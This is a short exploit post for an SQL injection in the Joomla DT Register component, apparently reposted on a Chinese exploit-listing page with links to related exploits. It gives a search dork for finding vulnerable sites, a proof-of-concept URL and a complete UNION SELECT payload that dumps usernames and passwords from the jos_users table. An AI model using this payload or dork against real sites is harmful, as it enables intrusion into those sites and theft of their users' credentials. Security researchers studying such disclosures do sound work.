/---------------------------------------------------------------
/
/ Joomla Component DT Register Remote SQL injection
/
---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkeR]
[*] Dork : inurl:com_DTRegister eventId
[*] Vendor : http://www.dthdevelopment.com/components/dt-register.html
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
[*] Greetings : All friends & muslims HaCkeRs
www.dz-secure.com
----------------------------------------------------------------------------
【Joomla Component DT Register Remote SQL injection Vulnerability】相关文章:
★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
★ tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
★ Joomla Component n-forms 1.01 Blind SQL Injection Exploit
★ Mole Group Real Estate Script
★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit